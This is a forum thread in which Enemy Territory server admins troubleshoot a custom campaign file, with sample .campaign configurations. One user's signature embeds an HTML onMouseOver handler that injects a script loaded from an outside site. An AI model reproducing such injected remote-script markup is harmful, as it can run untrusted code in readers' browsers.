Problem using certain maps in custom campaign

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

pow

Problem using certain maps in custom campaign

Post by pow »

I got a problem which I can't get solved. Whenever I try to add a map to my custom campaign which contains a _ the campaign won't work. For example the map Industry which is called ind_beta4.pk3 wont work just as any other map with a _ in it. Should I rename these maps before I can use them in a custom campaign?

Regards
tdg_sparky

Post by tdg_sparky »

Are you creating the campaign with an automated campaign-maker or manually?
pow

Post by pow »

manually, until now all have worked just fine. I had a ten map and a eight map campaign using caen and some other maps. No problems there. As soon as adding a map with _ all stops to work.....removing the map from the .campaign (rezip and rename as pk3), placing it in etmain, uploading it to the server where I keep maps and stuff for clients to download and all works fine again.
Badhabit

Post by Badhabit »

I have a few campaigns with _ in the map name and they all work fine

Code: Select all

{
	name			"RTCW Maps"
	shortname		"cmpgn_rtcw"
	description		"-=RTCW Maps=-*Welcome to the*{Zer0} House Servers.*Remember this is our house*and you are our guests.*Rules:*>Spawn Camping is aloud*>Intentional TKing will*   not be tolerated*WEB:www.zer0-clan.com*Rotation is: *Base*Beach*Ice*Tram*Village * * * * "
	maps			"tc_base;et_beach;et_ice;tram_et;et_village"
	mapTC			374 374
	type			"wolfmp"
}
{Zer0}'s House of Torment 67.19.67.118:27960
{Zer0}'s RTCW server 67.19.67.119:27960
Now Lets Go Kick Some ASS
And thats an Order.
hiro

Post by hiro »

You may already be doing this but be sure to write your campaign script in a text/code editor rather than in notepad.
pow

Post by pow »

I am indeed, I use Linux so the scripting is done in nano
KingJackaL

Post by KingJackaL »

Yeah, I have campaigns with 'et_beach' and 'et_ice' that work fine.

Are you sure your capitalization is good? Some map makers don't pay a lot of heed to conventions, and may use UPPERCASE letters in their .bsp names. If so, make sure you match case.
pow

Post by pow »

Well it seems that it is not the maps. I pressed escape whenever I saw the campaign wasn't loading so I could check anythng else. This time I just loaded Fueldump and went to see what I could do as ref. Well, I can pick all the maps (including maps with an _ in it's name) and from campaign I can pick the stand ones but my own campaign is not showing.....I'm lost. Just to make sure there are no errors I'll post my .campaign here:

Code: Select all

{
name "9 maps"
shortname "cmpgn_zzfcustom"
description "www..nl public:*9 map campaign.**All welcome, have fun. No greifing, laming or spamming spawns.**ETpro map scripts in use! Can dynamite back door on 
battery & spawn in garage on Fueldump.**Maps:*Fueldump, Oasis, Railgun, Caen, Radar, Marrakech Streets, Battery, Industry, Goldrush"
maps "fueldump;oasis;railgun;caen;radar;et_mor;battery;ind_beta4;goldrush"
mapTC 374 374
type "wolfmp"
}
Rain

Post by Rain »

Be certain you have all of the maps the campaign references on the client you're using to test; the campaign may not be shown otherwise.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
pow

Post by pow »

Wel, the campaign works...seems that it didn't like Fueldump as a starting map for some reason. Only problem left is that not all clients are showing the 9 maps during boot or any server info I wrote to go with it.
deej

Post by deej »

That happens when the client doesn't have all maps in the rotation on his system yet.

Feature request: in such a case at least show the descriptive text? Possible?
Our servers now run on 64 bit steroids. Point your ET to:
- Forgotten Ground StopWatch Server with occasional wolfrof 1
- Fraggle Rock ETPub Server - Mix up ET/UT & Duke Nukem
pow

Post by pow »

Aha! Thanx for clearing that up! Would indeed be nice if that would be changed in the future!

Thanx
tdg_sparky

Post by tdg_sparky »

I would recommend just getting an automatic campaign maker. There are plenty of free ones available out there. I use the one by Pharaohs and it hasnt failed me yet. I have not experienced any problems with the maps that have underlines in them.
pow

Post by pow »

There are no problems left tfg_sparky. Turns out I was using a wrong starting map for the campaign. I guess I prefer to make my own campaigns, onces you know how its quite simple actually.
I will have a look at an auto maker, for making more different campaigns it might be faster.

Thanx
tdg_sparky

Post by tdg_sparky »

What does the first map in the campaign have to do with it? Tell me your list in the order tha it wasnt working and I'll try it just to see if it really matters or not. I'm curious.